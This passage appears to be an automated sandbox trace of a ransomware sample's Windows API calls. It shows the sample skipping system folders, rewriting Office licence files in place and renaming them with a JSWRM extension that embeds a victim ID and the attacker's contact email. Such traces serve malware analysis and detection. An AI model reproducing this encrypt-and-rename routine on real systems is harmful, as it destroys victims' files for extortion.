[0106.343] lstrcmpiW (lpString1="OneNoteR_Retail-pl.xrm-ms", lpString2="...") returned 1 [0106.343] lstrcmpiW (lpString1="OneNoteR_Retail-pl.xrm-ms", lpString2="windows") returned -1 [0106.343] lstrcmpiW (lpString1="OneNoteR_Retail-pl.xrm-ms", lpString2="recovery") returned -1 [0106.343] lstrcmpiW (lpString1="OneNoteR_Retail-pl.xrm-ms", lpString2="perflogs") returned -1 [0106.343] lstrcmpiW (lpString1="OneNoteR_Retail-pl.xrm-ms", lpString2="documents and settings") returned 1 [0106.343] lstrcmpiW (lpString1="OneNoteR_Retail-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0106.343] lstrcmpiW (lpString1="OneNoteR_Retail-pl.xrm-ms", lpString2="system volume information") returned -1 [0106.343] lstrcmpiW (lpString1="OneNoteR_Retail-pl.xrm-ms", lpString2="msocache") returned 1 [0106.343] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0106.343] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteR_Retail-pl.xrm-ms", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0106.343] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0106.343] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteR_Retail-pl.xrm-ms", cchWideChar=25, lpMultiByteStr=0x241010, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteR_Retail-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 25 [0106.343] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0106.343] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0106.343] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteR_Retail-pl.xrm-ms", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0106.343] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0106.343] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteR_Retail-pl.xrm-ms", cchWideChar=25, lpMultiByteStr=0x2410d8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteR_Retail-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 25 [0106.343] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0106.343] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0106.344] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0106.344] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0106.344] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0106.344] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0106.344] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OneNoteR_Retail-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\onenoter_retail-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0106.344] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=10635) returned 1 [0106.344] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.344] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2980) returned 0x24c1d0 [0106.344] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2980, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2980, lpOverlapped=0x0) returned 1 [0106.346] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.347] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2980, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2980, lpOverlapped=0x0) returned 1 [0106.347] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0106.347] CloseHandle (hObject=0x45c) returned 1 [0106.347] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0106.347] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0106.347] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0106.347] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0106.347] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0106.347] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0106.347] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0106.347] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0106.347] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0106.347] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0106.347] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0106.347] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dff8 [0106.347] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0106.347] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0106.347] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OneNoteR_Retail-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\onenoter_retail-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OneNoteR_Retail-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\onenoter_retail-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0106.348] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dff8 | out: hHeap=0x1e0000) returned 1 [0106.348] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0106.348] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0106.348] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0106.348] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0106.348] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe7961b20, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe7961b20, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe7a6cae6, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x51a6, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="OneNoteR_Retail-ppd.xrm-ms", cAlternateFileName="OND371~1.XRM")) returned 1 [0106.348] lstrcmpiW (lpString1="OneNoteR_Retail-ppd.xrm-ms", lpString2=".") returned 1 [0106.348] lstrcmpiW (lpString1="OneNoteR_Retail-ppd.xrm-ms", lpString2="..") returned 1 [0106.348] lstrcmpiW (lpString1="OneNoteR_Retail-ppd.xrm-ms", lpString2="...") returned 1 [0106.348] lstrcmpiW (lpString1="OneNoteR_Retail-ppd.xrm-ms", lpString2="windows") returned -1 [0106.348] lstrcmpiW (lpString1="OneNoteR_Retail-ppd.xrm-ms", lpString2="recovery") returned -1 [0106.348] lstrcmpiW (lpString1="OneNoteR_Retail-ppd.xrm-ms", lpString2="perflogs") returned -1 [0106.348] lstrcmpiW (lpString1="OneNoteR_Retail-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0106.348] lstrcmpiW (lpString1="OneNoteR_Retail-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0106.348] lstrcmpiW (lpString1="OneNoteR_Retail-ppd.xrm-ms", lpString2="system volume information") returned -1 [0106.348] lstrcmpiW (lpString1="OneNoteR_Retail-ppd.xrm-ms", lpString2="msocache") returned 1 [0106.348] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0106.348] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteR_Retail-ppd.xrm-ms", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0106.349] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0106.349] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteR_Retail-ppd.xrm-ms", cchWideChar=26, lpMultiByteStr=0x240f20, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteR_Retail-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 26 [0106.349] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0106.349] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0106.349] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteR_Retail-ppd.xrm-ms", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0106.349] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0106.349] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteR_Retail-ppd.xrm-ms", cchWideChar=26, lpMultiByteStr=0x241330, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteR_Retail-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 26 [0106.349] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0106.349] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0106.349] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0106.349] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0106.349] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0106.349] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0106.349] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OneNoteR_Retail-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\onenoter_retail-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0106.349] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=20902) returned 1 [0106.349] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.349] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x51a0) returned 0x24c1d0 [0106.350] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x51a0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x51a0, lpOverlapped=0x0) returned 1 [0106.352] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.352] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x51a0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x51a0, lpOverlapped=0x0) returned 1 [0106.352] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0106.352] CloseHandle (hObject=0x45c) returned 1 [0106.352] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0106.353] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0106.353] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0106.353] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0106.353] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0106.353] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0106.353] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0106.353] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0106.353] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0106.353] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0106.353] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0106.353] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dff8 [0106.353] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0106.353] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0106.353] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OneNoteR_Retail-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\onenoter_retail-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OneNoteR_Retail-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\onenoter_retail-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0106.354] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dff8 | out: hHeap=0x1e0000) returned 1 [0106.354] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0106.354] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0106.354] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0106.354] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0106.354] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe78a2f2d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe78a2f2d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe79d4201, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d40, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="OneNoteR_Retail-ul-oob.xrm-ms", cAlternateFileName="ONA5A4~1.XRM")) returned 1 [0106.354] lstrcmpiW (lpString1="OneNoteR_Retail-ul-oob.xrm-ms", lpString2=".") returned 1 [0106.354] lstrcmpiW (lpString1="OneNoteR_Retail-ul-oob.xrm-ms", lpString2="..") returned 1 [0106.354] lstrcmpiW (lpString1="OneNoteR_Retail-ul-oob.xrm-ms", lpString2="...") returned 1 [0106.354] lstrcmpiW (lpString1="OneNoteR_Retail-ul-oob.xrm-ms", lpString2="windows") returned -1 [0106.354] lstrcmpiW (lpString1="OneNoteR_Retail-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0106.354] lstrcmpiW (lpString1="OneNoteR_Retail-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0106.354] lstrcmpiW (lpString1="OneNoteR_Retail-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0106.354] lstrcmpiW (lpString1="OneNoteR_Retail-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0106.354] lstrcmpiW (lpString1="OneNoteR_Retail-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0106.354] lstrcmpiW (lpString1="OneNoteR_Retail-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0106.354] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0106.354] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteR_Retail-ul-oob.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0106.354] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0106.354] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteR_Retail-ul-oob.xrm-ms", cchWideChar=29, lpMultiByteStr=0x241330, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteR_Retail-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0106.354] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0106.354] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0106.354] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteR_Retail-ul-oob.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0106.354] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0106.354] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteR_Retail-ul-oob.xrm-ms", cchWideChar=29, lpMultiByteStr=0x2410d8, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteR_Retail-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0106.354] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0106.354] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0106.354] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0106.354] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0106.354] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0106.354] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0106.355] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OneNoteR_Retail-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\onenoter_retail-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0106.355] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11584) returned 1 [0106.355] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.355] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d40) returned 0x24c1d0 [0106.355] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d40, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d40, lpOverlapped=0x0) returned 1 [0106.357] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.357] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d40, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d40, lpOverlapped=0x0) returned 1 [0106.357] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0106.357] CloseHandle (hObject=0x45c) returned 1 [0106.358] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0106.358] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0106.358] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0106.358] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0106.358] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0106.358] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0106.358] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0106.358] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0106.358] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0106.358] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0106.358] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0106.358] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e688 [0106.358] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0106.358] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0106.358] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OneNoteR_Retail-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\onenoter_retail-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OneNoteR_Retail-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\onenoter_retail-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0106.359] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e688 | out: hHeap=0x1e0000) returned 1 [0106.359] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0106.359] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0106.359] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0106.359] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0106.359] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe77be149, 